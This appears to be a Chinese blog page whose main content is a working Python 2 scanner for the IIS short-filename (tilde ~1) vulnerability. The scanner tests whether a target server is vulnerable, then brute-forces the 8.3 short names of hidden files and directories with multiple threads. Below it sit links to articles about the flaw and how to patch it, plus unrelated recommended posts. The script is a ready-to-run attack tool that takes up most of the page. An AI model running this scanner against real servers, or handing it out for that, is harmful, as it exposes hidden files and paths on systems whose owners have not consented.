#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import httplib
import urlparse
import string
import threading
import Queue
import time
import string
 
 
class Scanner():
    def __init__(self, target):
        self.target = target
        self.scheme, self.netloc, self.path, params, query, fragment = urlparse.urlparse(target)
 
        if self.path[-1:] != '/':    # ends with slash
            self.path += '/'
        self.payloads = list('abcdefghijklmnopqrstuvwxyz0123456789_-')
        self.files = []
        self.dirs = []
        self.queue = Queue.Queue()
        self.lock = threading.Lock()
        self.threads = []
     
 
    def _conn(self):
        try:
            if self.scheme == 'https':
                conn = httplib.HTTPSConnection(self.netloc)
            else:
                conn = httplib.HTTPConnection(self.netloc)
            return conn
        except Exception, e:
            print '[Exception in function _conn]', e
            return None
 
 
 
    # fetch http response status code
    def _get_status(self, path):
        try:
            conn = self._conn()
            conn.request('GET', path)
            status = conn.getresponse().status
            conn.close()
            return status
        except Exception, e:
            raise Exception('[Exception in function _get_status] %s' % str(e) )
 
 
 
    # test weather the server is vulerable
    def is_vul(self):
        try:
            status_1 = self._get_status(self.path + '/*~1****/a.aspx')    # an existed file/folder
            status_2 = self._get_status(self.path + '/san1e*~1****/a.aspx')    # not existed file/folder
            if status_1 == 404 and status_2 == 400:
                return True
            return False
        except Exception, e:
            raise Exception('[Exception in function is_val] %s' % str(e) )
 
 
 
    def run(self):
        # start from root path
        for payload in self.payloads:
            self.queue.put( (self.path + payload, '****') )    # filename, extention
        for i in range(10): 
            t = threading.Thread(target=self._scan_worker)
            self.threads.append(t)
            t.start()
 
    def report(self):
        for t in self.threads:
            t.join()
        self._print('-'* 64)
        for d in self.dirs:
            self._print('Dir:  ' + d)
        for f in self.files:
            self._print('File: ' + f)
        self._print('-'*64)
        self._print('%d Directories, %d Files found in toal' % (len(self.dirs), len(self.files)) )
 
 
    def _print(self, msg):
        self.lock.acquire()
        print msg
        self.lock.release()
 
    def _scan_worker(self):
        while True:
            try:
                url, ext = self.queue.get(timeout=3)
                status = self._get_status(url + '*~1' + ext + '/1.aspx')
                if status == 404:
                    self._print('Found ' +  url + ext + '\t[scan in progress]')
 
                    if len(url) - len(self.path)< 6:    # enum first 6 chars only
                        for payload in self.payloads:
                            self.queue.put( (url + payload, ext) )
                    else:
                        if ext == '****':    # begin to scan extention
                            for payload in string.ascii_lowercase:
                                self.queue.put( (url, '*' + payload + '**') )
                            self.queue.put( (url,'') )    # also it can be a folder
                        elif ext.count('*') == 3:
                            for payload in string.ascii_lowercase:
                                self.queue.put( (url, '*' + ext[1] + payload + '*') )
                        elif ext.count('*') == 2:
                            for payload in string.ascii_lowercase:
                                self.queue.put( (url, '*' + ext[1] + ext[2] + payload ) )
                        elif ext == '':
                            self.dirs.append(url + '~1')
                            self._print('Found Dir ' +  url + '~1\t[Done]')
 
                        elif ext.count('*') == 1:
                            self.files.append(url + '~1.' + ext[1:])
                            self._print('Found File ' + url + '~1.' + ext[1:] + '\t[Done]')
            except Exception,e:
                break
 
if len(sys.argv) == 1:
    print 'Usage: %s target' % sys.argv[0]
    sys.exit()
 
target = sys.argv[1]
s = Scanner(target)
if not s.is_vul():
    print 'Sorry, server is not vulerable'
    sys.exit(0)
 
print 'server is vulerable, please wait, scanning...'
s.run()
s.report()
 
运行截图:
 

IIS短文件名扫描工具的更多相关文章

  1. 利用URLScan工具过滤URL中的特殊字符(仅针对IIS6)-- 解决IIS短文件名漏洞

    IIS短文件名漏洞在windows服务器上面非常常见,也就是利用“~”字符猜解暴露短文件/文件夹名,比如,采用这种方式构造URL:http://aaa.com/abc~1/.aspx,根据IIS返回的 ...

  2. IIS短文件名漏洞原理与挖掘思路

    首先来几个网址先了解一下 https://www.jb51.net/article/166405.htm https://www.freebuf.com/articles/web/172561.htm ...

  3. IIS短文件名泄露漏洞危害及防范方法

    危害级别:轻微 IIS短文件名泄露漏洞 WASC Threat Classification 描述: Microsoft IIS在实现上存在文件枚举漏洞,攻击者可利用此漏洞枚举网络服务器根目录中的文件 ...

  4. IIS短文件名泄露漏洞危害及防范方法(转)

    攻击方法(转自http://blog.sina.com.cn/s/blog_64a3795a01017xqt.html) 一直在寻找一种方法,如果我可以使用通配符"*" 和 &qu ...

  5. IIS短文件名漏洞复现

    IIS短文件名漏洞复现 一.漏洞描述 此漏洞实际是由HTTP请求中旧DOS 8.3名称约定(SFN)的代字符(~)波浪号引起的.它允许远程攻击者在Web根目录下公开文件和文件夹名称(不应该可被访问). ...

  6. 【中间件】IIS短文件名枚举漏洞

    1.1.1  漏洞描述 为了兼容16位MS-DOS程序,Windows为文件名较长的文件(和文件夹)生成了对应的windows 8.3 短文件名. 在Windows下查看对应的短文件名,可以使用命令 ...

  7. IIS短文件名漏洞修补方法之一改注册表一个注意项

    1)1.png 为漏洞存在没有做任何修复的时候的扫描 修复:2) 修改注册表键值: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSy ...

  8. POC iis短文件名

    __author__ = '*'# -*- coding:utf-8 -*- from lib.httpparse import httpparse def verify(protocol,ip,po ...

  9. IIS6利用URLScan修复IIS短文件名漏洞

    一.下载URLScan 3.1 链接: http://pan.baidu.com/s/1i4HfKrj 密码: dmud 二.安装URLScan 3.1 安装完成以后,我们可以在System32/In ...

随机推荐

  1. 一起学HTML基础-CSS样式表-基本概念、分类、选择器

    一.基本概念: CSS  (Cascading Style Sheets)层叠样式表,是一种用来表现HTML(标准通用标记语言的一个应用)或XML(标准通用标记语言的一个子集)等文件样式的计算机语言. ...

  2. 【USACO 1.5】SuperPrime Rib

    /* TASK: sprime LANG: C++ SOLVE: dfs,后面每增加一位,判断当前是否为素数. 第一位不能为0 */ #include<cstdio> int n; voi ...

  3. (String)、toString、String.valueOf的区别

    String.valueOf()它可以将JAVA基本类型(int,double,boolean等)和对象(Object)转换成String型toString()是对象的方法,它可以将该对象转换成Str ...

  4. js-JavaScript高级程序设计学习笔记4

    第六章 面向对象的程序设计 1.面向对象的语言有一个标志,那就是它们都有类的概念,而通过类可以创建任意多个具有相同属性和方法的对象.如python.ES中没有类的概念. 2.ES的对象可以想象成散列表 ...

  5. 【bzoj1086】 scoi2005—王室联邦

    http://www.lydsy.com/JudgeOnline/problem.php?id=1086 (题目链接) 题意 求将树分为几个联通块,每个联通块大小大于B小于3B,是否可行. Solut ...

  6. html中span不显示背景

    如果不在span中输入任何文本,span设置的背景图将无法显示出来.解决办法就是设置为块元素,然后设置固定的宽高. 参考:http://blog.csdn.net/jarniyy/article/de ...

  7. NuGet在Push的时候提示“远程服务器返回错误:(403)已禁用”问题解决

    在使用NuGet把包push到nuget官网的时候,提示了如下信息: Failed to process request. 'The specified API key is invalid or d ...

  8. VS提示“项目文件" "已被重命名或已不在解决方案中”的解决办法 .

    多个项目的源码在一个源代码中,其中,有一个源代码废弃不可用了.删除后,再次生成解决方案时出现了问题“项目文件" "已被重命名或已不在解决方案中”. 解决方法是: 1.找到主项目,右 ...

  9. NetLink Communication Mechanism And Netlink Sourcecode Analysis

    catalog . Netlink简介 . Netlink Function API Howto . Generic Netlink HOWTO kernel API . RFC Linux Netl ...

  10. 基本概率分布Basic Concept of Probability Distributions 6: Exponential Distribution

    PDF version PDF & CDF The exponential probability density function (PDF) is $$f(x; \lambda) = \b ...